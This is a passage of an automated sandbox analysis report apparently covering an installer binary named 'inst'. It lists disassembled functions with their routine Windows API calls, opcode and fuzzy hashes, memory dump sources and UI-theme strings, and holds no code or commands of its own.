Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
Instruction ID: 7aac97b186b544510e35b55cea925ff03111d8c726e54288d62244df04cba276
Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
Instruction Fuzzy Hash: 77C092B248420C77CF111A82EC06E8A3F1A9BD1664F058020FB1C19660AA73EA65969D

Function 00AFAD5E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00AFAD6B

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
Instruction ID: ba29dda14392df80600acd3ddc95fad378799943a7c5818d449ceb4c316b6b73
Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
Instruction Fuzzy Hash: 76C09BB244010C77CF111DC2DC02E553F1997D4760F048010FB1C1D161E573E5619685

Function 00A93D10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,00000080), ref: 00A93D18

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3a3c98170e37c8f10da7cfd875c8e93a3e4ebf006fa035c38f663eeaf8d17b32
Instruction ID: 3e7cd62d093dd9495e7d47ef99e071be56b482c40fb86b2f48413bad36d52706
Opcode Fuzzy Hash: 3a3c98170e37c8f10da7cfd875c8e93a3e4ebf006fa035c38f663eeaf8d17b32
Instruction Fuzzy Hash: 4DC00236440108BBDF525F90EC05F9E3F26BB54751F048015FA5849071DB3296B5EB84

Function 00A93CA8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__read.LIBCMT ref: 00A93CBE

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: __read
String ID:
API String ID: 1330306528-0
Opcode ID: 627988362cf98099db0abecbe1b77d65a3d091794f3f46832c121beea6ab4c39
Instruction ID: b39b9767b02462dc82f55156bd4cbaa1ad48ecd7f09bd757121ff3870bb592b6
Opcode Fuzzy Hash: 627988362cf98099db0abecbe1b77d65a3d091794f3f46832c121beea6ab4c39
Instruction Fuzzy Hash: C4C08C3A809200BFC7034790BC01A1ABB61ABA1310F04C81AF9D800022EA3A4578E753

Function 6C5D846A Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(6C639C7E,00000000,?,?,?), ref: 6C5D847C

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 02e6ae1682a9d5b390b007635724fe5e4fce76dba42f11ad6b198d11b60600cd
Instruction ID: b06775521f38b7b1d133313d2ea88b6650349ffcaa49ee4cc15aef15a38e616a
Opcode Fuzzy Hash: 02e6ae1682a9d5b390b007635724fe5e4fce76dba42f11ad6b198d11b60600cd
Instruction Fuzzy Hash: E0C0013B018200FFCF024B80CA04C0ABFB2BB99326F10C848B2A90803183338032EF06

Function 00AB5E24 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 00AB5E36

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
Instruction ID: eea3f1f600f57e6be839ff3324e32955c5b0d44ddec7c8ef99e88bc83afa443c
Opcode Fuzzy Hash: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
Instruction Fuzzy Hash: 0FC0013A018200FFCA024B80CD04D0ABFB2BBA8325B10C858B2A848031C733C032EB02

Function 00AC2E1E Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 00AC2E30

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
Instruction ID: eea3f1f600f57e6be839ff3324e32955c5b0d44ddec7c8ef99e88bc83afa443c
Opcode Fuzzy Hash: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
Instruction Fuzzy Hash: 0FC0013A018200FFCA024B80CD04D0ABFB2BBA8325B10C858B2A848031C733C032EB02

Function 00AB3EE0 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 00AB3EF2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
Instruction ID: eea3f1f600f57e6be839ff3324e32955c5b0d44ddec7c8ef99e88bc83afa443c
Opcode Fuzzy Hash: 7586a20e366f33f00cc39a01c86795088c6386edc7a04221dde5665bb216c95d
Instruction Fuzzy Hash: 0FC0013A018200FFCA024B80CD04D0ABFB2BBA8325B10C858B2A848031C733C032EB02

Function 00AA67D0 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,000007E9,?,?), ref: 00AA67E0

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8286cb0242e06ba95fd0c99ba71b59cb5e11d2971fd54dd3543fdad69bef432f
Instruction ID: 2c1fe107717f23eac930d37e5296c92466be098fea7f4d3e5642554883f93220
Opcode Fuzzy Hash: 8286cb0242e06ba95fd0c99ba71b59cb5e11d2971fd54dd3543fdad69bef432f
Instruction Fuzzy Hash: 82B0923A909241BFCA029B61CD09C8EBE72BBA8384F008449B28815070C63680B0EF02

Function 00A93CED Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

__locking.LIBCMT ref: 00A93CF9

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: __locking
String ID:
API String ID: 793501599-0
Opcode ID: 8de71eea63014ef0e9bc0fb451592f828a1a23cc2667e30a76acf752c6adc1a6
Instruction ID: d65e012af5ca2ca3bbedecc8d6cf662ed95d0be241ec5cabcad1694ff6851feb
Opcode Fuzzy Hash: 8de71eea63014ef0e9bc0fb451592f828a1a23cc2667e30a76acf752c6adc1a6
Instruction Fuzzy Hash: 33B0027A408204BECA425B90AD55E1FBBA2ABA4724F54C959B6A840121E7329538EB53

Function 00A94C5A Relevance: 1.3, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000018), ref: 00A94C69

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e73fa7806717225303468aae1462d9059a1e62d7741d3dd49537ba76e48363a1
Instruction ID: b77282282d2acb690a6282ab26666df87a0c0ba2fc35aa3a3a793c9769d000b7
Opcode Fuzzy Hash: e73fa7806717225303468aae1462d9059a1e62d7741d3dd49537ba76e48363a1
Instruction Fuzzy Hash: 5BD0C934305201AFEE0157709D44A6977E2AB88331FA08A18B561D21E0CB34C8019611

Function 00A929D7 Relevance: 1.3, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000018), ref: 00A929E6

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: ef28ecde92202e432fe9f04b435436a8e57667f7bd5811b038a217f2c1be745b
Instruction ID: bffac1052950b9db60791f9db00c7a0265e56d7b1d8a295ea1f021ef7183f874
Opcode Fuzzy Hash: ef28ecde92202e432fe9f04b435436a8e57667f7bd5811b038a217f2c1be745b
Instruction Fuzzy Hash: B8D0C935608200BFDF215BB09D0592A7BE7EB88331FA08A18F676C20A0CB35CC10AB12

Function 00AB6959 Relevance: 1.3, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00AB69EF,00AB68D3,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00AB74F6,?,&pid=), ref: 00AB696A

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7d0c9a7ed208897bb5dd22c736bdb750e9669f48a8b275050b6bdabc8955a862
Instruction ID: 6d5c1f0783868506917a63d44fd864ff25347fb2afe33536d7f8ab336adab30e
Opcode Fuzzy Hash: 7d0c9a7ed208897bb5dd22c736bdb750e9669f48a8b275050b6bdabc8955a862
Instruction Fuzzy Hash: F1D09E724107118BD7308F25E54879276F8AB04B36F244A5DA4B687591C774D9458A54

Function 00A93D33 Relevance: 1.3, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000018), ref: 00A93D42

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: f2f82acfb01983a96a62f0dd86840fd4fcbdc92c54b0a7ba127a439084fecfbe
Instruction ID: fa1188e834e453ebc782a1d2a5bb25394c248005815b3cef120239baedb0e611
Opcode Fuzzy Hash: f2f82acfb01983a96a62f0dd86840fd4fcbdc92c54b0a7ba127a439084fecfbe
Instruction Fuzzy Hash: DED0C936308200BFCF515BB49D1892A7BF2EB84371B508E18F575C60E0CB39CD10AB12

Function 00A93DA6 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000018), ref: 00A93DB5

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 1497f2c710b871f635ddff89f9131fe779f3c5ad135b94add4a65deeb5e27e23
Instruction ID: 6cc6bea635c87f15d707b541f2bb99cc775ad852ba17d3f03f0bc8900ae6aa30
Opcode Fuzzy Hash: 1497f2c710b871f635ddff89f9131fe779f3c5ad135b94add4a65deeb5e27e23
Instruction Fuzzy Hash: 51D01235304201BFDF015770DD1496E7AF2EB44371B500E58F5A1C21F0CB35CC45A611

Non-executed Functions

Function 6C5DAC46 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 353stringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C5DAC65
CharNextW.USER32(?,00000024), ref: 6C5DACA3
CharNextW.USER32(00000000), ref: 6C5DACF8
CharNextW.USER32(00000000), ref: 6C5DAD25
CharNextW.USER32(00000000), ref: 6C5DAD3C
CharNextW.USER32(00000000), ref: 6C5DAD54
CharNextW.USER32(00000000), ref: 6C5DAD74
CharNextW.USER32(00000000), ref: 6C5DADD3
__fprintf_l.LIBCMT ref: 6C5DAEB8
_wcslen.LIBCMT ref: 6C5DAEBE
lstrlenW.KERNEL32(?), ref: 6C5DAEF9
CharNextW.USER32(?,00000024), ref: 6C5DAFEB
CharNextW.USER32(?), ref: 6C5DAFF5
_vswprintf_s.LIBCMT ref: 6C5DB020

Strings

%*.*f, xrefs: 6C5DAEB1

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: CharNext$H_prolog3__fprintf_l_vswprintf_s_wcslenlstrlen
String ID: %*.*f
API String ID: 2955926446-4192566172
Opcode ID: fe39b04d4b0d29d1ebb4dd601cd19659bdd2cffb4389032ba6bfec05f5e0ef00
Instruction ID: 154647ed79104b9c8b8642ba15b49b1e64f5408e886193a5b456ad29cea3d777
Opcode Fuzzy Hash: fe39b04d4b0d29d1ebb4dd601cd19659bdd2cffb4389032ba6bfec05f5e0ef00
Instruction Fuzzy Hash: B7C1C0B990131B8BDF10DFADCC846AFB2B0EF05319F524659D460E6A80D774A981C77E

Function 6C62EC18 Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 312COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C62ECD0
StringFromGUID2.OLE32(6C6BD1C4,?,00000104), ref: 6C62ECEC
_memset.LIBCMT ref: 6C62ED3F
StringFromGUID2.OLE32(6C6BD014,?,00000104,?,6C6C7AEC), ref: 6C62ED58

Strings

opacity, xrefs: 6C62EDED
rich_list, xrefs: 6C62EC8A
theme, xrefs: 6C62EF20
icon, xrefs: 6C62EE55
iid, xrefs: 6C62ED7F
category, xrefs: 6C62ED10
image, xrefs: 6C62EEB6
line_height, xrefs: 6C62EDB7

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: FromString_memset
String ID: category$icon$iid$image$line_height$opacity$rich_list$theme
API String ID: 4039750888-1465912547
Opcode ID: 0db0c3f1715086fad8bccbfc5fadeba662ba3962fc13afdd20f7c63ccf4a56cf
Instruction ID: 566f908726ada0f737577174a698db44c2e1f9f877c455b7d9ae43864ba401be
Opcode Fuzzy Hash: 0db0c3f1715086fad8bccbfc5fadeba662ba3962fc13afdd20f7c63ccf4a56cf
Instruction Fuzzy Hash: 72B16571A10208BBCB09EFA9DC91DEE7BB9EF95358F100119F405A7750DB346909CBAE

Function 6C616C64 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 246COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C616C6B

Part of subcall function 6C5DC2CF: lstrlenW.KERNEL32(00000010,THEME.UI,?,00000000,6C5F0BA5,?,00000008,6C5FDEF0,?,00000010,?), ref: 6C5DC2F9

Part of subcall function 6C65A9FC: __EH_prolog3.LIBCMT ref: 6C65AA03

Part of subcall function 6C65A916: __EH_prolog3.LIBCMT ref: 6C65A91D

Strings

margin, xrefs: 6C616E58
shortcut, xrefs: 6C616F20
style, xrefs: 6C616D4A
anchor, xrefs: 6C616EE4
0,0,0,0, xrefs: 6C616E22
tip, xrefs: 6C616EA6
0x%x, xrefs: 6C616D0A, 6C616D12, 6C616D66
tab_id, xrefs: 6C616CE5
bound, xrefs: 6C616E0A
%d,%d,%d,%d, xrefs: 6C616DD4
control_style, xrefs: 6C616D97

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
